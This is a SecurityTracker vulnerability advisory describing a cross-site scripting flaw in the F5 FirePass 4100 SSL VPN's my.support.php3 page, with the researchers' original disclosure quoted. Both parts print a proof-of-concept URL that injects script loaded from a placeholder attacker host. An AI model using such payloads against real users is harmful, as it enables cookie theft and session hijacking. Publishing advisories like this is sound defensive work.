SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Device (Router/Bridge/Hub)  >   F5 FirePass Vendors:   F5 Networks
F5 FirePass Input Validation Hole in 'my.support.php3' Permits Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1015798
SecurityTracker URL:  http://securitytracker.com/id/1015798
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 21 2006
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included:  Yes  
Version(s): F5 Firepass 4100 SSL VPN version 5.4.2
Description:   A vulnerability was reported in F5 FirePass. A remote user can conduct cross-site scripting attacks.

The 'my.support.php3' script does not properly filter HTML code from user-supplied input in the 's' parameter before displaying the input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the FirePass device and will run in the security context of that device. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the device, access data recently submitted by the target user via web form to the device, or take actions on the device acting as the target user.

A demonstration exploit URL is provided:

https://[target]/my.support.php3?c=1&s=username</title><img
src=http://[attacker]/EXPLOIT.JS>&lang=en&charset=iso-8859-
1&uilangchar=en.iso-8859-1

ILION Research Labs, Geneva Switzerland, discovered this vulnerability.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the FirePass device, access data recently submitted by the target user via web form to the device, or take actions on the device acting as the target user.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.f5.com/products/FirePass/ (Links to External Site)
Cause:   Input validation error

Message History:   None.


 Source Message Contents

Subject:  XSS in Firepass 4100 SSL VPN v.5.4.2 (and probably others)

Vulnerability class : Cross-Site Scripting
Discovery date : 2nd of February 2006
Remote : Yes
Local : No
Credit : ILION Research Labs, Geneva Switzerland
Vulnerable : F5 Firepass 4100 SSL VPN v. 5.4.2

A XSS (Cross-Site-Scripting) vulnerability has been uncovered in my.support.php3 called through a Web browser on the F5 Firepass 4100
 SSL VPN. 

This allows an attacker to submit a crafted link to users of the vulnerable Web application in order to abuse their trust and steal
 their authentication credentials or hijack their sessions.

Trust abuse can be complete since the SSL certificate can appear as vouching for the trustworthiness of the website while the page
 actually displayed is hosted on a malicious third-party server (this can be done by using the <iframe> tag of IE for example).

Proof-of-concept exploit :

https://www.vulnerable_server.com/my.support.php3?c=1&s=username</title><img
src=http://MALICIOUS_SERVER.COM/EXPLOIT.JS>&lang=en&charset=iso-8859-
1&uilangchar=en.iso-8859-1

where http://MALICIOUS_SERVER.COM/EXPLOIT.JS is a malicious JavaScript interpreted by the victim's navigator.

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC